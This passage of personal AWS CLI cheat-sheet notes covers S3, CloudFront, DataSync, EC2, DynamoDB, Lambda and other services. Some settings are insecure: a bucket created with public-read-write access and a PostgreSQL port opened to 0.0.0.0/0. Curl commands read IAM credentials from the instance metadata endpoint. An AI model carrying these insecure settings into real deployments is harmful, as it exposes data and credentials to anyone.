  3. Viewer protocol policy: HTTPS only
  4. Custom SSL certificate - optional
    1. request a public certificate

      https://us-east-1.console.aws.amazon.com/acm - AWS Certificate Manager -> Certificates

    2. domain name *.my.service

      add '*.' as a prefix

    3. create new
    4. copy CNAME name, CNAME value
    5. open your external ( non AWS ) DNS console and create/update record with type: CNAME
    6. validation will come later
  5. select newly created acm resource name ( SSL certificate )
  6. Alternative domain name (CNAME) - optional www.my.service
  7. Supported HTTP versions: HTTP/2 HTTP/3
  8. waiting for the "SSL validation"
  9. change DNS
    1. type: CNAME, name: www, value: {Distribution domain name like: d365erk6waf21.cloudfront.net}
    2. waiting for propogation
  10. visit your https://www.my.service

possible issues:

  • SSL_ERROR_NO_CYPHER_OVERLAP

    cloudfront.Alternative domain name (CNAME) Custom SSL Certificate.domain name

s3 operations

# make bucket - create bucket with globally unique name
AWS_BUCKET_NAME="my-bucket-name" 
aws s3 mb s3://$AWS_BUCKET_NAME
aws s3 mb s3://$AWS_BUCKET_NAME --region us-east-1 

# https://docs.aws.amazon.com/cli/latest/reference/s3api/create-bucket.html
# public access - Block all public access - Off
aws s3api create-bucket --bucket $AWS_BUCKET_NAME --acl public-read-write

# enable mfa delete
aws s3api put-bucket-versioning --bucket $AWS_BUCKET_NAME --versioning-configuration Status=Enabled,MFADelete=Enabled --mfa "arn-of-mfa-device mfa-code" --profile root-mfa-delete-demo
# disable mfa delete
aws s3api put-bucket-versioning --bucket $AWS_BUCKET_NAME --versioning-configuration Status=Enabled,MFADelete=Disabled --mfa "arn-of-mfa-device mfa-code" --profile root-mfa-delete-demo

# list of all s3
aws s3 ls
aws s3api list-buckets
aws s3api list-buckets --query "Buckets[].Name"
aws s3api list-buckets --query 'Buckets[?contains(Name, `my_bucket_name`) == `true`] | [0].Name' --output text 

# Bucket Policy, public read ( Block all public access - Off )
aws s3api get-bucket-location --bucket $AWS_BUCKET_NAME

# put object
aws s3api put-object --bucket $AWS_BUCKET_NAME --key file-name.with_extension --body /path/to/file-name.with_extension
# copy to s3, upload file less than 5 Tb
aws s3 cp /path/to/file-name.with_extension s3://$AWS_BUCKET_NAME
aws s3 cp /path/to/file-name.with_extension s3://$AWS_BUCKET_NAME/path/on/s3/filename.ext
# update metadata
aws s3 cp test.txt s3://a-bucket/test.txt --metadata '{"x-amz-meta-cms-id":"34533452"}'
# read metadata
aws s3api head-object --bucket a-bucketbucket --key img/dir/legal-global/zach-walsh.jpeg

# copy from s3 to s3
aws s3 cp s3://$AWS_BUCKET_NAME/index.html s3://$AWS_BUCKET_NAME/index2.html

# download file
aws s3api get-object --bucket $AWS_BUCKET_NAME --key path/on/s3 /local/path

# create folder, s3 mkdir
aws s3api put-object --bucket my-bucket-name --key foldername/
# sync folder local to remote s3
aws s3 sync /path/to/some/folder s3://my-bucket-name/some/folder
# sync folder remote s3 to local
aws s3 sync s3://my-bucket-name/some/folder /path/to/some/folder 
# sync folder with remote s3 bucket with public access
aws s3 sync /path/to/some/folder s3://my-bucket-name/some/folder --acl public-read
# sync folder with remote s3 bucket and remove all not existing files locally but existing in bucket
aws s3 sync s3://my-bucket-name/some/folder /path/to/some/folder --delete
# list of all objects
aws s3 ls --recursive s3://my-bucket-name 
# list of all object by specified path ( / at the end must be )
aws s3 ls --recursive s3://my-bucket-name/my-sub-path/
# download file
aws s3api head-object --bucket my-bucket-name --key file-name.with_extension
# move file 
aws s3 mv s3://$AWS_BUCKET_NAME/index.html s3://$AWS_BUCKET_NAME/index2.html
# remove file remove object
aws s3 rm  s3://$AWS_BUCKET_NAME/file-name.with_extension 
aws s3api delete-object --bucket $AWS_BUCKET_NAME --key file-name.with_extension 
# remove all objects
aws s3 rm s3://$AWS_S3_BUCKET_NAME --recursive --exclude "account.json" --include "*"
#!!! using only '--include "test-file*"' - will remove all files, not only specified in include section !!!, use instead of:

# upload file and make it public
aws s3api put-object-acl --bucket <bucket name> --key <path to file> --acl public-read
# read file 
aws s3api get-object --bucket <bucket-name> --key=<path on s3> <local output file>

# read version of object on S3
aws s3api list-object-versions --bucket $AWS_BUCKET_NAME --prefix $FILE_KEY
# read file by version 
aws s3api get-object --bucket $AWS_S3_BUCKET_NAME --version-id $VERSION_ID --key d3a274bb1aba08ce403a6a451c0298b9 /home/projects/temp/$VERSION_ID

# history object history list
aws s3api list-object-versions --bucket $AWS_S3_BUCKET_NAME --prefix $AWS_FILE_KEY | jq '.Versions[]' | jq '[.LastModified,.Key,.VersionId] | join(" ")' | grep -v "_response" | sort | sed "s/\"//g"
# remove s3
aws s3 ls
aws s3 rm s3://$AWS_BUCKET_NAME --recursive --include "*"
aws s3api delete-bucket --bucket $AWS_BUCKET_NAME
  • Bucket Policy, public read ( Block all public access - Off )
{
    "Version": "2012-10-17",
    "Id": "policy-bucket-001",
    "Statement": [
        {
            "Sid": "statement-bucket-001",
            "Effect": "Allow",
            "Principal": "*", 
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::YOUR_BUCKET_NAME/*"
        }
    ]
}
  • Access Control List - individual objects level
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObjectAcl",
                "s3:PutObjectAcl"
            ],
            "Resource": "arn:aws:s3:::*/*"
        }
    ]
}
  • Full access for role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowS3ReadAccess",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::INSERT-ACCOUNT-NUMBER:role/INSERT_ROLE_NAME"
      },
      "Action": "s3:*",
      "Resource": [
        "arn:aws:s3:::INSERT-BUCKET-NAME",
        "arn:aws:s3:::INSERT-BUCKET-NAME/*"
      ]
    }
  ]
}

datasync

move large amounts of data between on-premises storage and AWS storage services
DataSync configuration can be set up via AWS Management Console

aws_service_abbr="datasync"
aws-cli-doc
aws-faq
aws-console
aws-feature

datasync links

steps

  1. download datasync agent image DataSync -> Agents -> Create agent -> Deploy Agent
    1. download image
    2. start image in player
      1. install Oracle VM Virtual Box
      sudo apt install virtualbox
      1. File > Import Appliance…
      2. for entering into VM (ssh):
        DATASYNC_AGENT_IP=192.168.178.48
        DATASYNC_SSH_USER=admin
        DATASYNC_SSH_PASS=password
        sshpass -p ${DATASYNC_SSH_PASS} ssh ${DATASYNC_SSH_USER}@${DATASYNC_AGENT_IP}
  2. activate datasync agent
    1. via ssh
    2. via curl ( select CLI )
    DATASYNC_AGENT_IP=192.168.178.48
    ACTIVATION_REGION=eu-central-1
    curl "http://${DATASYNC_AGENT_IP}/?gatewayType=SYNC&activationRegion=${ACTIVATION_REGION}&no_redirect"
    
    # key 5C6V2-zzzz-yyyy-xxxx-xxxx
  3. register/create DataSync via aws console DataSync -> Agents -> create agent enter your key
  4. DataSync -> Tasks -> Create task
  5. configure DataSync options.
  6. Start, monitor, and review the DataSync task.

Agent

  • An agent is a virtual machine (VM) used to read data from or write data to a location.
  • An agent is used on premises(in cloud) to manage both read and write operations.
  • Agent status: online/offline A location is a:
    • endpoint of a task
    • source
    • destination
    • service used in the data transfer task.
  • DataSync agent overview
    1. TCP: 80 (HTTP) Used by your computer to obtain the agent activation key. After successful activation, DataSync closes the agent's port 80.
    2. TCP: 443 (HTTPS)
      • Used by the DataSync agent to activate with your AWS account. This is for agent activation only. You can block the endpoints after activation.
      • For communication between the DataSync agent and the AWS service endpoint. API endpoints: datasync.$region.amazonaws.com
        Data transfer endpoints: $taskId.datasync-dp.$region.amazonaws.com cp.datasync.$region.amazonaws.com
        Data transfer endpoints for FIPS: cp.datasync-fips.$region.amazonaws.com
        Agent updates: repo.$region.amazonaws.com repo.default.amazonaws.com packages.$region.amazonaws.com
    3. TCP/UDP: 53 (DNS) For communication between DataSync agent and the DNS server.
    4. TCP: 22 Allows AWS Support to access your DataSync to help you with troubleshooting DataSync issues. You don't need this port open for normal operation, but it is required for troubleshooting.
    5. UDP: 123 (NTP) Used by local systems to synchronize VM time to the host time. NTP 0.amazon.pool.ntp.org 1.amazon.pool.ntp.org 2.amazon.pool.ntp.org 3.amazon.pool.ntp.org

Task

Task management/configuration can be set up via:

  • AWS Management Console
  • AWS Command Line Interface (AWS CLI)
  • DataSync API Task configuration settings includes:
  • source
  • destination
  • options
  • filtering (include/exclude)
  • scheduling
  • frequency
  • tags
  • logging Task phases
  • queuing
  • launching
  • preparing
  • transferring
  • verifying (VerifyMode)
  • success/failure

DataSync operations

your_account_id=802320....
task_id=task-292234306
execution_id=exec-00ab121a437a222

aws datasync list-task-executions --task-arn arn:aws:datasync:eu-central-1:$your_account_id:task/$task_id
aws datasync describe-task-execution --task-execution-arn arn:aws:datasync:eu-central-1:$your_account_id:task/$task_id/execution/$execution_id | jq '.Includes[].Value, .FilesTransferred, .BytesTransferred'

RDS

should be considered DataStorage type like ( see CommandQueryResponsibilitySegregation ):

  • read heavy
  • write heavy
    jdbc wrapper
    there are "Database Migration Service"

PostgreSQL

!!! important during creation need to set up next parameter:
Additional configuration->Database options->Initial Database ->
default schema - postgres !!! if you have created Public accessible DB, pls, check/create inbound rule in security group: IPv4 PostgreSQL TCP 5432 0.0.0.0/0


aws_service_abbr="athena"
aws-cli-doc
aws-faq
aws-console
### simple data  
s3://my-bucket-001/temp/
```csv
column-1,column-2,column3
1,one,first
2,two,second
3,three,third
4,four,fourth
5,five,fifth

create database

CREATE DATABASE IF NOT EXISTS cherkavi_database_001 COMMENT 'csv example' LOCATION 's3://my-bucket-001/temp/';

create table

CREATE EXTERNAL TABLE IF NOT EXISTS num_sequence (id int,column_name string,column_value string)
ROW FORMAT DELIMITED
      FIELDS TERMINATED BY ','
      ESCAPED BY '\\'
      LINES TERMINATED BY '\n'
    LOCATION 's3://my-bucket-001/temp/';

--- another way to create table 
CREATE EXTERNAL TABLE num_sequence2 (id int,column_name string,column_value string)
ROW FORMAT SERDE 'org.apache.hadoop.hive.serde2.OpenCSVSerde' 
WITH SERDEPROPERTIES ("separatorChar" = ",", "escapeChar" = "\\") 
LOCATION 's3://my-bucket-001/temp/'    

execute query

select * from num_sequence;

CloudFront

cloud-front

aws_service_abbr="cloudfront"
aws-cli-doc
aws-faq
aws-console
flowchart RL;
    AvailabilityZone --o Region
        EdgeLocation --o Region
Loading

nice to have 2-3 availability zones

REGION=us-east-1
BUCKET_NAME=bucket-for-static-web
BUCKET_HOST=$BUCKET_NAME.s3-website-$REGION.amazonaws.com
DISTRIBUTION_ID=$BUCKET_HOST'-cli-3'
DOMAIN_NAME=$BUCKET_HOST
echo '{
    "CallerReference": "cli-example",
    "Aliases": {
        "Quantity": 0
    },
    "DefaultRootObject": "index.html",
    "Origins": {
        "Quantity": 1,
        "Items": [
            {
                "Id": "'$DISTRIBUTION_ID'",
                "DomainName": "'$DOMAIN_NAME'",
                "OriginPath": "",
                "CustomHeaders": {
                    "Quantity": 0
                },
                "CustomOriginConfig": {
                    "HTTPPort": 80,
                    "HTTPSPort": 443,
                    "OriginProtocolPolicy": "http-only",
                    "OriginSslProtocols": {
                        "Quantity": 1,
                        "Items": [
                            "TLSv1.2"
                        ]
                    },
                    "OriginReadTimeout": 30,
                    "OriginKeepaliveTimeout": 5
                },
                "ConnectionAttempts": 3,
                "ConnectionTimeout": 10,
                "OriginShield": {
                    "Enabled": false
                },
                "OriginAccessControlId": ""
            }
        ]
    },
    "OriginGroups": {
        "Quantity": 0
    },
    "DefaultCacheBehavior": {
        "TargetOriginId": "'$DISTRIBUTION_ID'",
        "ForwardedValues": {
            "QueryString": false,
            "Cookies": {
                "Forward": "none"
            },
            "Headers": {
                "Quantity": 0
            },
            "QueryStringCacheKeys": {
                "Quantity": 0
            }
        },        
        "TrustedSigners": {
            "Enabled": false,
            "Quantity": 0
        },
        "TrustedKeyGroups": {
            "Enabled": false,
            "Quantity": 0
        },
        "ViewerProtocolPolicy": "redirect-to-https",
        "MinTTL": 0,
        "AllowedMethods": {
            "Quantity": 2,
            "Items": [
                "HEAD",
                "GET"
            ],
            "CachedMethods": {
                "Quantity": 2,
                "Items": [
                    "HEAD",
                    "GET"
                ]
            }
        },
        "SmoothStreaming": false,
        "Compress": true,
        "LambdaFunctionAssociations": {
            "Quantity": 0
        },
        "FunctionAssociations": {
            "Quantity": 0
        },
        "FieldLevelEncryptionId": ""
    },
    "CacheBehaviors": {
        "Quantity": 0
    },
    "CustomErrorResponses": {
        "Quantity": 0
    },
    "Comment": "",
    "PriceClass": "PriceClass_All",
    "Enabled": true,
    "ViewerCertificate": {
        "CloudFrontDefaultCertificate": true,
        "SSLSupportMethod": "vip",
        "MinimumProtocolVersion": "TLSv1",
        "CertificateSource": "cloudfront"
    },
    "Restrictions": {
        "GeoRestriction": {
            "RestrictionType": "none",
            "Quantity": 0
        }
    },
    "WebACLId": "",
    "HttpVersion": "http2",
    "IsIPV6Enabled": true,
    "Staging": false
}' > distribution-config.json
# vim distribution-config.json
aws cloudfront create-distribution --distribution-config file://distribution-config.json
# "ETag": "E2ADZ1SMWE",   

aws cloudfront list-distributions | grep DomainName

# aws cloudfront list-distributions | grep '"Id":'
# aws cloudfront delete-distribution --id E6Q0X5NZY --if-match E2ADZ1SMWE
### cloudfront delete
DISTRIBUTION_ID=`aws cloudfront list-distributions | jq -r ".DistributionList.Items[].Id"`
echo $DISTRIBUTION_ID | clipboard
aws cloudfront get-distribution --id $DISTRIBUTION_ID > $DISTRIBUTION_ID.cloud_front
DISTRIBUTION_ETAG=`jq -r .ETag $DISTRIBUTION_ID.cloud_front`
## disable distribution
# fx $DISTRIBUTION_ID.cloud_front
jq '.Distribution.DistributionConfig.Enabled = false' $DISTRIBUTION_ID.cloud_front |  jq '.Distribution.DistributionConfig' > $DISTRIBUTION_ID.cloud_front_updated 
aws cloudfront update-distribution --id $DISTRIBUTION_ID --if-match $DISTRIBUTION_ETAG --distribution-config file://$DISTRIBUTION_ID.cloud_front_updated 
## remove distribution
aws cloudfront get-distribution --id $DISTRIBUTION_ID > $DISTRIBUTION_ID.cloud_front
DISTRIBUTION_ETAG=`jq -r .ETag $DISTRIBUTION_ID.cloud_front`
aws cloudfront delete-distribution --id $DISTRIBUTION_ID --if-match $DISTRIBUTION_ETAG

Secrets manager

aws_service_abbr="secretsmanager"
aws-cli-doc
aws-faq
aws-console

boto3 python lib
see:

### CLI example
# read secret
aws secretsmanager get-secret-value --secret-id LinkedIn_project_Web_LLC --region $AWS_REGION --profile cherkavi-user

readonly policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "secretsmanager:GetSecretValue",
            "Resource": "arn:aws:secretsmanager:*:*:secret:*"
        }
    ]
}
# create secret
aws secretsmanager put-secret-value --secret-id MyTestDatabaseSecret --secret-string file://mycreds.json

# create secret for DB
aws secretsmanager create-secret \
    --name $DB_SECRET_NAME \
    --secret-string "{\"engine\":\"mysql\",\"username\":\"$DB_LOGIN\",\"password\":\"$DB_PASSWORD\",\"dbname\":\"$DB_NAME\",\"port\": \"3306\",\"host\": $DB_ADDRESS}"

EC2

aws_service_abbr="ec2"
aws-cli-doc
aws-faq
aws-console

purchases options

# list ec2, ec2 list, instances list
aws ec2 describe-instances --profile $AWS_PROFILE --region $AWS_REGION --filters Name=tag-key,Values=test
# example
aws ec2 describe-instances --region us-east-1 --filters "Name=tag:Name,Values=ApplicationInstance"
# !!! without --filters will give you not a full list of EC2 !!!

connect to launched instance

INSTANCE_PUBLIC_DNS="ec2-52-29-176.eu-central-1.compute.amazonaws.com"
ssh -i $AWS_KEY_PAIR ubuntu@$INSTANCE_PUBLIC_DNS

connect to instance in private subnet, bastion approach

flowchart LR;
    a[actor] -->|inventory| jb
    subgraph public subnet    
        jb[ec2 
           jumpbox]
    end
    subgraph private subnet    
        s[ec2 
          server]
    end
    jb -->|inventory| s

Loading

reading information about current instance, local ip address, my ip address, connection to current instance, instance reflection, instance metadata, instance description

curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/instance-id
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/api/token
# public ip 
curl http://169.254.169.254/latest/meta-data/public-ipv4

curl http://169.254.169.254/latest/dynamic/instance-identity/document

create token from ec2 instance

TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
export AWS_REGION=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" -s http://169.254.169.254/latest/dynamic/instance-identity/document | jq -r '.region')

connect to launched instance without ssh

using SSM-agent installed in

# ssm role should be provided for account
aws ssm start-session --target i-00ac7eee --profile awsstudent --region us-east-1

DNS issue space exceed

sudo systemctl restart systemd-resolved
sudo vim /etc/resolv.conf
# nameserver 127.0.0.53
nameserver 10.0.0.2
options edns0 trust-ad
search ec2.internal

SSM

aws_service_abbr="ssm"
aws-cli-doc
aws-faq
# GET PARAMETERS
aws ssm get-parameters --names /my-app/dev/db-url /my-app/dev/db-password
aws ssm get-parameters --names /my-app/dev/db-url /my-app/dev/db-password --with-decryption

# GET PARAMETERS BY PATH
aws ssm get-parameters-by-path --path /my-app/dev/
aws ssm get-parameters-by-path --path /my-app/ --recursive
aws ssm get-parameters-by-path --path /my-app/ --recursive --with-decryption

EBS - block storage

aws_service_abbr="ebs"
aws-cli-doc
aws-faq

snapshot can be created from one ESB snapshot can be copied to another region volume can be created from snapshot and attached to EC2 ESB --> Snapshot --> copy to region --> Snapshot --> ESB --> attach to EC2

attach new volume

# list volumes
sudo lsblk
sudo fdisk -l
# describe volume from previous command - /dev/xvdf
sudo file -s /dev/xvdf
# !!! new partitions !!! format volume
# sudo mkfs -t xfs /dev/xvdf
# or # sudo mke2fs /dev/xvdf
# attach volume
sudo mkdir /external-drive
sudo mount /dev/xvdf /external-drive

ELB - Elastic Load Balancer

elb

aws_service_abbr="elb"
aws-cli-doc
aws-faq
flowchart LR;
    r[Request] --> lb
    l[Listener] --o lb[Load Balancer]

    lr[Listener
       Rule] --o l
    lr --> target_group1
    lr --> target_group2
    lr --> target_group3

    subgraph target_group1
        c11[ec2]
        c12[ec2]
        c13[ec2]
    end
    subgraph target_group2
        c21[ec2]
        c22[ec2]
        c23[ec2]
    end
    subgraph target_group3
        c31[ec2]
        c32[ec2]
        c33[ec2]
    end
    
Loading

autoscaling group

ELB troubleshooting

# documentation 
aws_service_abbr="elb"; cli-doc

EFS - Elastic File System storage

aws_service_abbr="efs"
aws-cli-doc
aws-faq
# how to write files into /efs and they'll be available on both your ec2 instances!

# on both instances:
sudo yum install -y amazon-efs-utils
sudo mkdir /efs
sudo mount -t efs fs-yourid:/ /efs

SQS - Queue Service

types: standart, fifo

aws_service_abbr="sqs"
aws-cli-doc
aws-faq
# get CLI help
aws sqs help

# list queues and specify the region
aws sqs list-queues --region $AWS_REGION

AWS_QUEUE_URL=https://queue.amazonaws.com/3877777777/MyQueue 
aws sqs send-message --queue-url ${QUEUE_NAME} --message-body '{"test":00001}'
# status of the message - available 
aws sqs receive-message --queue-url ${QUEUE_NAME}
# status of the message - message in flight
RECEIPT_HANDLE=$(echo $RECEIVE_MESSAGE_OUTPUT | jq -r '.Messages[0].ReceiptHandle')
aws sqs delete-message --queue-url ${QUEUE_NAME} --receipt-handle $RECEIPT_HANDLE
# status of the message - not available 
# send a message
aws sqs send-message help
aws sqs send-message --queue-url $AWS_QUEUE_URL --region $AWS_REGION --message-body "my test message"

# receive a message
aws sqs receive-message help
aws sqs receive-message --region $AWS_REGION  --queue-url $AWS_QUEUE_URL --max-number-of-messages 10 --visibility-timeout 30 --wait-time-seconds 20

# delete a message ( confirmation of receiving !!! )
aws sqs delete-message help
aws sqs receive-message --region us-east-1  --queue-url $AWS_QUEUE_URL --max-number-of-messages 10 --visibility-timeout 30 --wait-time-seconds 20

aws sqs delete-message --receipt-handle $MESSAGE_ID1 $MESSAGE_ID2 $MESSAGE_ID3 --queue-url $AWS_QUEUE_URL --region $AWS_REGION

EventBridge

Event hub that receives, collects, filters, routes events ( message with body and head ) based on rules
to receiver back, to another serviceS, to apiS ...
Similar to SQS but wider.
Offers comprehensive monitoring and auditing capabilities.

terms

  • Event
    A JSON-formatted message that represents a change in state or occurrence in an application or system
  • Event bus A pipeline that receives events from various sources and routes them to targets based on defined rules
  • Event source The origin of events, which can be AWS services, custom applications, or third-party SaaS providers
  • Event pattern A JSON-based structure that is used in rules to define criteria for matching events
  • Schema A structured definition of an event's format, which can be used for code generation and validation
  • Rule Criteria that are used to match incoming events and determine how they should be processed or routed
  • Archive A feature that makes it possible for you to store events for later analysis or replay
  • Target The destination where matched events are sent, which offers options for event transformation, further processing, and reliable delivery mechanisms, including dead-letter queues

links


Lambda

  • java - best choice ( price, exec.time ), GraalVM?
  • python - 35x time slower!!! than java
  • rust - not for business applications
  • tradeoff: lambda vs k8s(EC2)
aws_service_abbr="lambda"
aws-cli-doc
aws-faq
aws-console

/tmp directory can be used for saving cache or collaboration between multiple invocations

list of functions

aws lambda list-functions --function-version ALL --region us-east-1 --output text --query "Functions[?Runtime=='python3.7'].FunctionArn"

remove function

# aws lambda update-function-configuration --function-name my-function --environment "Variables={FIRST=1,SECOND=2}"
# aws lambda list-functions --query 'Functions[].FunctionName'
FUNCTION_NAME=back2ussr-user-get
aws lambda delete-function --function-name $FUNCTION_NAME

examples

API Gateway, Lambda url, remote invocation url

google-chrome https://"$AWS_REGION".console.aws.amazon.com/apigateway/main/apis?region="$AWS_REGION"
# API -> Stages

Lambda function editor, list of all functions

enter point for created Lambdas

google-chrome "https://"$AWS_REGION".console.aws.amazon.com/lambda/home?region="$AWS_REGION"#/functions"

invoke function from CLI, lambda execution

LAMBDA_NAME="function_name"
# example of lambda execution
aws lambda invoke  \
--profile $AWS_PROFILE --region $AWS_REGION \
--function-name $LAMBDA_NAME \
output.log

# example of lambda execution with payload
aws lambda invoke  \
--profile $AWS_PROFILE --region $AWS_REGION \
--function-name $LAMBDA_NAME \
--payload '{"key1": "value-1"}' \
output.log


# example of asynchronic lambda execution with payload
# !!! with SNS downstream execution !!! 
aws lambda invoke  \
--profile $AWS_PROFILE --region $AWS_REGION \
--function-name $LAMBDA_NAME \
--invocation-type Event \
--payload '{"key1": "value-1"}' \
output.log

IAM->Policies->Create policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "lambda:InvokeFunction",
            "Resource": "arn:aws:lambda:*:*:function:*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "logs:CreateLogStream",
                "dynamodb:PutItem",
                "dynamodb:GetItem",
                "logs:PutLogEvents"
            ],
            "Resource": [
                "arn:aws:dynamodb:*:*:table/*",
                "arn:aws:logs:eu-central-1:8557202:log-group:/aws/lambda/function-name-1:*"
            ]
        }
    ]
}

lambda logs, check logs

### lambda all logs
x-www-browser "https://"$AWS_REGION".console.aws.amazon.com/cloudwatch/home?region="$AWS_REGION"#logs:
### lambda part of logs
x-www-browser "https://"$AWS_REGION".console.aws.amazon.com/cloudwatch/home?region="$AWS_REGION"#logStream:group=/aws/lambda/"$LAMBDA_NAME";streamFilter=typeLogStreamPrefix"
  • install plugin: AWS Toolkit,
  • right bottom corner - select Region, select Profile

    profile must have:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "iam:ListRoleTags",
                "iam:GetPolicy",
                "iam:ListRolePolicies"
            ],
            "Resource": [
                "arn:aws:iam::*:policy/*",
                "arn:aws:iam::*:role/*"
            ]
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": "iam:ListRoles",
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor2",
            "Effect": "Allow",
            "Action": "iam:PassRole",
            "Resource": "arn:aws:iam::*:role/*"
        },
        {
            "Effect": "Allow",
            "Action": "s3:*",
            "Resource": "*"
        }
    ]
}
  • New->Project->AWS
  • create new Python file from template ( my_aws_func.py )
import json
def lambda_handler(event, context):
    return {
        'statusCode': 200,
        'body': json.dumps('Hello from Lambda!')
    }
  • Create Lambda Function, specify handler: my_aws_func.lambda_handler

aws sam aws tools for devops

for building serverless applications

# https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-cli-install.html
pip3 install aws-sam-cli
sam --version

sam cli init
sam deploy --guided

Python Zappa

virtualenv env
source env/bin/activate
# update your settings https://github.com/Miserlou/Zappa#advanced-settings
zappa init
zappa deploy dev
zappa update dev

DynamoDB

store data in items, not in rows

aws_service_abbr="dynamodb"
aws-cli-doc
aws-faq
aws-console

documentation documentation developer guide dynamodb local run dynamodb query language partiql - sql-like syntax dynamodb via CLI

Keys

  • Partition key ( Type: HASH )
  • Sort key ( Type: Range )
  • Unique key: primary/composite

Secondary Index:

  • local ( < 10Gb )
  • global

Query data:

  • by partition key
  • create secondary index
  • data duplication with target partition key

Scan data:

filter by conditions

Batch operation:

  • get
  • write ( not update )
# list of tables: https://$AWS_REGION.console.aws.amazon.com/dynamodb/home?region=$AWS_REGION#tables:
aws dynamodb list-tables

TABLE_NAME=my_table
# create table from CLI
aws dynamodb wizard new-table

# create table from CLI
aws dynamodb create-table \
--table-name $TABLE_NAME \
--attribute-definitions \
  AttributeName=column_id,AttributeType=N \
  AttributeName=column_name,AttributeType=S \
--key-schema \
  AttributeName=column_id,KeyType=HASH \
  AttributeName=column_name,KeyType=RANGE \
--billing-mode=PAY_PER_REQUEST \
--region=$AWS_REGION

# describe table 
aws dynamodb describe-table --table-name $TABLE_NAME

# write item, write into DynamoDB
aws dynamodb put-item \
--table-name $TABLE_NAME \
--item '{"column_1":{"N":1}, "column_2":{"S":"first record"} }'
--region=$AWS_REGION
--return-consumed-capacity TOTAL

# update item 
aws dynamodb put-item \
--table-name $TABLE_NAME \
--key '{"column_1":{"N":1}, "column_2":{"S":"first record"} }' \
--update-expression "SET country_name=:new_name" \
--expression-attribute-values '{":new_name":{"S":"first"} }' \
--region=$AWS_REGION \
--return-value ALL_NEW

aws dynamodb update-item --table-name $TABLE_NAME \
--key '{"column_1":{"N":"1"}}' \
--attribute-updates '{"column_1": {"Value": {"N": "1"},"Action": "ADD"}}' \
--return-values ALL_NEW

# select records
aws dynamodb query \
  --table-name $TABLE_NAME \
  --key-condition-expression "column_1 = :id" \
  --expression-attribute-values '{":id":{"N":"1"}}' \
  --region=$AWS_REGION
  --output=table

aws dynamodb scan --table-name $TABLE_NAME \
--filter-expression "column_1 = :id" \
--expression-attribute-values '{":id":{"N":"1"}}'

# read all items
aws dynamodb scan --table-name $TABLE_NAME

# delete item
aws dynamodb delete-item --table-name $TABLE_NAME --key '{"column_1":{"N":"2"}}'

# delete table
aws dynamodb delete-table --table-name $TABLE_NAME

put_item issue

Type mismatch for key id expected: N actual: S"

key id must be Numeric

{"id": 10003, "id_value":  "cherkavi_value3"}

Route53

aws_service_abbr="route53"
aws-cli-doc
aws-faq
aws-console

Web application environment, application network connection

health check ( light ) - answer from endpoint
health check ( heavy ) - answer from resources behind the application

flowchart LR;
    d[dns] --> r
    r[Route 53] --> 
    lb[load 
       balancer]

    li[listener] --o lb

    tg[target
       group] ---o lb

    tg --> port[port]

    port --o ap[application]

    ap --o i[instance]

    i -.->|w| l[log]

    l --o cw[cloud 
    watch]

    ap <-.->|rw| db[(DB)]

    sm[secret 
       manager] --w-->
    cr[credentials]

    cr --o i
Loading

SNS

aws_service_abbr="sns"
aws-cli-doc
aws-faq
aws-console


### list of topics
aws sns list-topics --profile $AWS_PROFILE --region $AWS_REGION
#### open browser with sns dashboard
google-chrome "https://"$AWS_REGION".console.aws.amazon.com/sns/v3/home?region="$AWS_REGION"#/topics"

### list of subscriptions
aws sns list-subscriptions-by-topic --profile $AWS_PROFILE --region $AWS_REGION --topic-arn {topic arn from previous command}

### send example via cli
    #--message file://message.txt
aws sns publish  --profile $AWS_PROFILE --region $AWS_REGION \
    --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
    --message "hello from aws cli"

### send message via web 
google-chrome "https://"$AWS_REGION".console.aws.amazon.com/sns/v3/home?region="$AWS_REGION"#/publish/topic/topics/"$AWS_SNS_TOPIC_ARN

CloudWatch

cloud-watch

aws_service_abbr="cloudwatch"
aws-cli-doc
aws-faq
aws-console
 Metrics-----\
              +--->Events------>Alarm
  Logs-------/
+----------------------------------+
        dashboards

CloudTrail

control/log input/output API calls
can be activated inside VPC
cloud-trail


Kinesis

aws_service_abbr="kinesis"
aws-cli-doc
aws-faq
aws-console

kinesis cli

# write record
aws kinesis put-record --stream-name my_kinesis_stream --partition_key "my_partition_key_1" --data "{'first':'1'}"
# describe stream
aws kinesis describe-stream --stream-name my_kinesis_stream 
# get records
aws kinesis get-shard-iterator --stream-name my_kinesis_stream --shard-id "shardId-000000000" --shard-iterator-type TRIM_HORIZON
aws kinesis get-records --shard-iterator 
# PRODUCER
# CLI v2
aws kinesis put-record --stream-name test --partition-key user1 --data "user signup" --cli-binary-format raw-in-base64-out
# CLI v1
aws kinesis put-record --stream-name test --partition-key user1 --data "user signup"


# CONSUMER 
# describe the stream
aws kinesis describe-stream --stream-name test
# Consume some data
aws kinesis get-shard-iterator --stream-name test --shard-id shardId-000000000000 --shard-iterator-type TRIM_HORIZON
aws kinesis get-records --shard-iterator <>

KMS

aws_service_abbr="kms"
aws-cli-doc
aws-faq
aws-console
# 1) encryption
aws kms encrypt --key-id alias/tutorial --plaintext fileb://ExampleSecretFile.txt --output text --query CiphertextBlob  --region eu-west-2 > ExampleSecretFileEncrypted.base64
# base64 decode
cat ExampleSecretFileEncrypted.base64 | base64 --decode > ExampleSecretFileEncrypted

# 2) decryption
